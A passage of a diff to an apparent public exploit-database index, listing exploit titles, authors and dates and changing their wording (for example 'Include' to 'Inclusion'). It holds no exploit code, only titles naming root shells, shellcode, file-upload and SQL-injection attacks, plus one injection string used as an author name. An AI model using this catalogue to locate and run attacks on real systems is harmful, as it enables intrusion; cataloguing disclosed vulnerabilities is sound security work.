Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80 37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0 @@ -33637,7 +33637,7 @@ id,file,description,date,author,platform,type,port 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross Site Scripting + Information Disclosure + Directory Traversal Vulnerabilities",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 -37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Include",2012-05-23,AkaStep,php,webapps,0 +37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 @@ -33656,7 +33656,7 @@ id,file,description,date,author,platform,type,port 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell",2015-06-16,rebel,linux,local,0 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80 -37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 +37271,platforms/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080 37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 @@ -33677,7 +33677,7 @@ id,file,description,date,author,platform,type,port 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos,0 37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900 -37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0 +37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Inclusion Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0 37331,platforms/php/webapps/37331.py,"WHMCS 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0 37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF",2015-06-16,"Jerold Hoong",php,webapps,0 @@ -33710,7 +33710,7 @@ id,file,description,date,author,platform,type,port 39249,platforms/php/webapps/39249.txt,"WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0 -37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 +37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,hyp3rlinx,php,webapps,80 37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0 @@ -33740,9 +33740,9 @@ id,file,description,date,author,platform,type,port 37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0 37386,platforms/osx/dos/37386.php,"Safari 8.0.X / OS X Yosemite 10.10.3 - Crash Proof Of Concept",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 -37387,platforms/php/webapps/37387.txt,"Koha <= 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 -37388,platforms/php/webapps/37388.txt,"Koha <= 3.20.1 - Path Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 -37389,platforms/php/webapps/37389.txt,"Koha <= 3.20.1 - Multiple XSS and XSRF Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 +37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 +37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Path Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 +37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple XSS and XSRF Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod('/etc/shadow'_'0777') shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 @@ -33751,7 +33751,7 @@ id,file,description,date,author,platform,type,port 37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Stored XSS",2015-06-26,"Suraj Krishnaswami",windows,webapps,0 37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-13,Sangteamtham,windows,remote,0 37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0 -37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Include / Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0 +37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0 37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",php,webapps,0 37400,platforms/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",windows,remote,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - Encoded execve shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 @@ -33768,14 +33768,14 @@ id,file,description,date,author,platform,type,port 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection Vulnerabilities",2012-06-16,JosS,php,webapps,0 -37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0 +37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection and Local File Inclusion Vulnerabilities",2012-06-16,snup,php,webapps,0 37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",php,webapps,0 -37565,platforms/php/webapps/37565.txt,"Mahara <= 1.4.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 -37566,platforms/php/dos/37566.php,"PHP <= 5.4.3 PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 +37565,platforms/php/webapps/37565.txt,"Mahara 1.4.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 +37566,platforms/php/dos/37566.php,"PHP 5.4.3 PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 37497,platforms/php/webapps/37497.txt,"Flogr 'tag' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0 37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 @@ -33794,7 +33794,7 @@ id,file,description,date,author,platform,type,port 37437,platforms/php/webapps/37437.txt,"Coppermine Photo Gallery 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",php,webapps,0 37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross Site Scripting",2012-06-21,"Sooraj K.S",php,webapps,0 37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80 -37441,platforms/jsp/webapps/37441.txt,"WedgeOS <= 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0 +37441,platforms/jsp/webapps/37441.txt,"WedgeOS 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0 37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434 37443,platforms/php/webapps/37443.txt,"Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection",2012-06-21,CoBRa_21,php,webapps,0 37444,platforms/php/webapps/37444.txt,"Cotonti 'admin.php' SQL Injection",2012-06-22,AkaStep,php,webapps,0 @@ -33812,7 +33812,7 @@ id,file,description,date,author,platform,type,port 37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0 37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor 'spellchecker.php') Cross Site Scripting",2012-06-25,"Emilio Pinna",php,webapps,0 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos,0 -37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0 +37459,platforms/php/webapps/37459.txt,"Umapresence Local File Inclusion and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0 37461,platforms/php/webapps/37461.txt,"DigPHP 'dig.php' Script Remote File Disclosure",2012-06-26,"Ryuzaki Lawlet",php,webapps,0 37462,platforms/windows/dos/37462.pl,"VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 @@ -33838,7 +33838,7 @@ id,file,description,date,author,platform,type,port 37483,platforms/php/webapps/37483.txt,"WordPress church_admin Plugin 'id' parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37484,platforms/php/webapps/37484.txt,"WordPress Knews Multilingual Newsletters Plugin Cross Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37485,platforms/php/webapps/37485.txt,"WordPress PHPFreeChat 'url' Parameter Cross Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 -37486,platforms/php/webapps/37486.txt,"sflog! 'section' Parameter Local File Include",2012-07-06,dun,php,webapps,0 +37486,platforms/php/webapps/37486.txt,"sflog! 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0 37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service",2012-07-06,IOactive,multiple,dos,0 37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0 @@ -33855,7 +33855,7 @@ id,file,description,date,author,platform,type,port 37503,platforms/php/webapps/37503.txt,"Event Calender PHP Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 37504,platforms/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0 -37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Include",2012-07-16,"Sammy FORGIT",php,webapps,0 +37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 37507,platforms/php/webapps/37507.txt,"web@all 'name' Parameter Cross Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 37508,platforms/php/webapps/37508.txt,"Rama Zeiten CMS 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",php,webapps,0 37509,platforms/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps,0 @@ -33868,9 +33868,9 @@ id,file,description,date,author,platform,type,port 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service",2012-07-18,t3rm!n4t0r,multiple,dos,0 -37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component 'controller' Parameter Local File Include",2012-07-19,"AJAX Security Team",php,webapps,0 -37520,platforms/php/webapps/37520.txt,"Maian Survey 'index.php' URI Redirection and Local File Include Vulnerabilities",2012-07-20,PuN!Sh3r,php,webapps,0 -37521,platforms/php/webapps/37521.txt,"CodeIgniter <= 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 +37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component 'controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 +37520,platforms/php/webapps/37520.txt,"Maian Survey 'index.php' URI Redirection and Local File Inclusion Vulnerabilities",2012-07-20,PuN!Sh3r,php,webapps,0 +37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,Metasploit,multiple,remote,0 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 @@ -33910,8 +33910,8 @@ id,file,description,date,author,platform,type,port 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 37568,platforms/windows/dos/37568.pl,"VLC Media Player '.3gp' File Divide-By-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 37569,platforms/multiple/webapps/37569.txt,"ntop 'arbfile' Parameter Cross Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 -37570,platforms/multiple/webapps/37570.py,"Zenoss <= 3.2.1 Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 -37571,platforms/multiple/webapps/37571.txt,"Zenoss <= 3.2.1 Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 +37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 +37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 37572,platforms/php/webapps/37572.txt,"Elefant CMS 'id' Parameter Cross Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 37575,platforms/php/webapps/37575.txt,"Joomla! 'com_photo' module Multiple SQL Injection Vulnerabilities",2012-08-06,"Chokri Ben Achor",php,webapps,0 @@ -33926,7 +33926,7 @@ id,file,description,date,author,platform,type,port 37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 -37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Include",2012-08-07,PuN!Sh3r,php,webapps,0 +37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 @@ -33955,7 +33955,7 @@ id,file,description,date,author,platform,type,port 37614,platforms/php/webapps/37614.txt,"PBBoard index.php Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 -37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 +37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Inclusion and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple RCE Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0 @@ -33968,16 +33968,16 @@ id,file,description,date,author,platform,type,port 37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0 37633,platforms/php/webapps/37633.txt,"mIRC 'projects.php' Cross Site Scripting",2012-08-10,TayfunBasoglu,php,webapps,0 -37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki Multiple Remote and Local File Include Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 -37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Include",2012-08-10,L0n3ly-H34rT,php,webapps,0 +37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki Multiple Remote and Local File Inclusion Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 +37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Inclusion",2012-08-10,L0n3ly-H34rT,php,webapps,0 37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 -37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Include",2012-08-17,cheki,php,webapps,0 +37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,php,webapps,0 37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos,0 37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service",2012-08-20,Dark-Puzzle,windows,dos,0 37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting",2012-08-21,Mr.0c3aN,php,webapps,0 37642,platforms/php/webapps/37642.txt,"SaltOS 'download.php' Cross Site Scripting",2012-08-18,"Stefan Schurtz",php,webapps,0 -37643,platforms/php/webapps/37643.txt,"IBM Rational ClearQuest <= 8.0 Multiple Security Vulnerabilities",2012-08-27,anonymous,php,webapps,0 +37643,platforms/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 Multiple Security Vulnerabilities",2012-08-27,anonymous,php,webapps,0 37644,platforms/php/webapps/37644.txt,"Jara 1.6 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 37646,platforms/php/webapps/37646.txt,"Banana Dance Cross Site Scripting and SQL Injection Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 @@ -33990,7 +33990,7 @@ id,file,description,date,author,platform,type,port 37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 -37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Include",2012-08-23,"Corrado Liotta",php,webapps,0 +37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0 37688,platforms/php/remote/37688.txt,"PHP 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0 37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0 @@ -34005,7 +34005,7 @@ id,file,description,date,author,platform,type,port 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting",2012-08-29,MustLive,php,webapps,0 37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,windows,dos,0 -37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Include",2012-08-24,"Yakir Wizman",php,webapps,0 +37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 37677,platforms/php/webapps/37677.txt,"WordPress Finder 'order' Parameter Cross Site Scripting",2012-08-25,Crim3R,php,webapps,0 @@ -34015,7 +34015,7 @@ id,file,description,date,author,platform,type,port 37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 -37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 +37684,platforms/php/webapps/37684.html,"PrestaShop 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service",2012-08-30,"Stefan Bauer",xml,dos,0 37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - CSRF",2015-07-24,hyp3rlinx,multiple,webapps,0 37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting",2012-08-30,HauntIT,php,webapps,0 @@ -34023,8 +34023,8 @@ id,file,description,date,author,platform,type,port 37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias 